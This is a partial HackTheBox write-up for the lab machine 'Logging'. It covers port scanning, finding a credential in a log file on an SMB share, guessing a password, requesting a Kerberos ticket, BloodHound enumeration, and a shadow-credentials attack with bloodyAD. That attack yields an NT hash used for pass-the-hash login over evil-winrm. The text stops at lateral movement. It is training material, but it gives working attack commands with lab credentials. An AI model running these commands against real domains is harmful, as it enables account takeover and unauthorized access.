Skip to content

HackTheBox: Logging


Arbaaz Jamadar
Written by
Arbaaz Jamadar
Cloud Security Engineer | OSCP | AWS Security Specialty | CySA+ | Threat Detection & Incident Response

Initial Enumeration:

Assumed breach: 

wallace.everette:Welcome2026@

Port scan: 

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-19 02:39:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8530/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
8531/tcp  open  ssl/unknown
|_ssl-date: 2026-04-19T02:40:39+00:00; +7h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.logging.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.logging.htb
| Not valid before: 2026-04-16T15:12:07
|_Not valid after:  2027-04-16T15:12:07
| tls-alpn: 
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
49714/tcp open  msrpc         Microsoft Windows RPC

SMB:

  1. The user wallace.everette has read access over 4 SMB shares.
  2. Two shares are interesting:
    1. Logs → Contains logs
    2. WSUSTemp → Seems like there is a Windows Server Update Services (WSUS) running in the network

image.png

  1. The log file IdentitySync_Trace_20260219.log , contains credential for ldap bind that were logged into the logfile because of (invalid creds).

    image.png

  2. But the password pattern is a bit guessable, helping us derive a valid password lets try Em3rg3ncyPa$$2026.

    image.png

  3. The user svc_recovery is protected, we will need a ticket to authenticate as svc_recovery

    image.png

  4. We were able to mint a ticket using imacpket-getTGT

    svc_recovery:Em3rg3ncyPa$$2026
    getTGT.py 'logging.htb/svc_recovery:Em3rg3ncyPa$$2026'

    image.png

  5. The ticket is valid and we are able to authenticate:

    image.png

  6. We can’t log onto the DC via winrm

BloodHound:

  1. Since the user svc_recovery has no remote access, we need to enumerate relations to checkout if we have any other privileges/relations we can use to get initial foothold.

  2. Dump relations using rusthound-ce :

    rusthound-ce -d logging.htb -u 'wallace.everette' -p 'Welcome2026@' -c All

  3. The user svc_recovery has GenericWrite privilege over msa_health$ and user msa_health$ has remote access to dc01

    image.png

    image.png

Initial Foothold:

  1. We can use shadow credential abuse to get NT Hash for msa_health$

    bloodyAD --host DC01.logging.htb -d logging.htb -k --dc-ip 10.129.30.12 -u svc_recovery add shadowCredentials msa_health$

    image.png

  2. The credentials are:

    msa_health$:603fc24ee01a9409f83c9d1d701485c5

  3. Initial foothold gained via user msa_health$ with winrm

    evil-winrm -i logging.htb -u "msa_health$" -H '603fc24ee01a9409f83c9d1d701485c5'

    image.png

Lateral Movement:

  1. The user msa_health$ contains a powershell script that checks if the task is scheduled.

    image.png

image.png

Feel free to reachout on LinkedIn or any of my socials in case you need help with the challenge. The full writeup will be released after the box is retired.